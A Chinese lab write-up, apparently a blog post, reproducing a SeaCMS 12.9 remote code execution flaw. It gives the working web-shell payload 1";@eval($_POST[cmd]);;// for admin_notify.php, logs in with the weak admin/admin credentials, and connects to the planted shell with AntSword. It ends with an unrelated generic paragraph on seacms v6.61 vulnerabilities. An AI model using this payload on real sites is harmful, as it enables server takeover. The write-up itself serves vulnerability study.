SeaCMS海洋影视管理系统远程代码执行漏洞复现

SeaCMS海洋影视管理系统远程代码执行漏洞复现

免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

Ⅰ、环境搭建

首先搭建靶场环境

我们需要提前准备好一个正常使用的小皮面板

然后我们把提前准备好的压缩包解压出来并且放置到小皮面板的网站目录下

我的小皮面板服务目录在C:\phpstudy_pro\WWW

然后把刚刚的某洋cms放置到www目录下

在这里插入图片描述
然后我们可以通过网页来进行访问然后安装,我的ip是192.168.1.57

所以就去到http://192.168.1.57/SeaCMS_12.9/Upload/install/index.php这个文件来进行安装操作,打开此url会出现下面的界面,然后点击右下角的开始
在这里插入图片描述

直接同意

在这里插入图片描述
在这里插入图片描述

信息无误后点击下一步

下一步之后就需要我们填写数据库密码了,其他如果小皮没有变化就直接不管
在这里插入图片描述

点击下一步即可看见安装完成
在这里插入图片描述

Ⅱ、漏洞复现

接下来正式开始复现

http://192.168.212.133/SeaCMS_12.9/Upload/s2bj3v

首先我们去到http://192.168.1.57/SeaCMS_12.9/Upload/ew6sv/这个文件目录
在这里插入图片描述
在这里插入图片描述

因为我们是直接在这里安装的,保存了我们的cookie所以我们就直接进来了,如果没有直接进来也不要紧,直接弱密码账户admin 密码admin就行了
在这里插入图片描述

注意ew6sv这个目录是上图自动生成的

然后我们可以直接去到

http://192.168.1.57/SeaCMS_12.9/Upload/ew6sv/admin_notify.php

这个地址下的admin_notify.php文件

在这里插入图片描述

然后我们只需要在这里输入

1";@eval($_POST[cmd]);;//

然后下面的随便填,就像这样子

在这里插入图片描述

点击确认

确认后我们去到

http://192.168.1.57/SeaCMS_12.9/Upload/data/admin/notify.php

这个位置,这里便是我们刚刚写入马子的位置

直接打开蚁剑就可以直接正向连接了
在这里插入图片描述

Ⅲ、漏洞分析

然后是代码审计

我们可以分别看一下这俩php文件到底发生了什么导致了RCE

在这里插入图片描述

首先是他以写模式打开了

http://192.168.1.57/SeaCMS_12.9/Upload/data/admin/notify.php

这个地方的notify.php文件然后把内容拼接了上去,但是并没有检查拼接的字符串中是否存在特殊字符,而直接进去了

然后我们看一下写入的内容

在这里插入图片描述
很明显我们输入的双引号把变量前面的内容给闭合了,然后后面有双斜杠直接注释了后方的内容,所以就导致了我们利用蚁剑来正向shell

seacms v6.61是一款开源的内容管理系统,经过测试发现存在一些安全漏洞。这些漏洞可能会被黑客利用,对网站的安全性造成威胁。下面就seacms v6.61漏洞进行具体分析。 首先,seacms v6.61存在SQL注入漏洞。黑客可以通过构造恶意的SQL语句,绕过系统的安全验证,获取到数据库中的敏感信息。这可能包括用户名、密码等用户的个人信息。为了解决这个问题,网站管理员需要对数据库查询语句进行过滤和验证,确保用户输入的内容不会被当作SQL命令执行。 其次,seacms v6.61还存在跨站脚本攻击漏洞。如果网站没有对用户输入的数据进行过滤和验证,黑客可以插入恶意的脚本代码,从而在用户浏览网页时执行非法的操作。这可能导致用户的个人信息被窃取,或者被重定向到恶意网站。网站管理员应该对用户输入的数据进行过滤和转义,确保不会执行任何可能的危险操作。 此外,seacms v6.61还存在文件上传漏洞。黑客可以利用这个漏洞,上传恶意文件到网站服务器上,进而执行任意的系统命令。为了解决这个问题,网站管理员应该限制上传文件的类型和大小,并对用户上传的文件进行病毒扫描和安全验证。 总之,seacms v6.61存在多个安全漏洞,可能会给网站及其用户带来潜在的风险。网站管理员应该密切关注官方的安全更新,及时修补漏洞,加强对系统的安全防护措施。另外,用户在使用seacms v6.61时也应该注意保护自己的个人信息,避免受到黑客攻击的威胁。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

安全攻防赵小龙

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值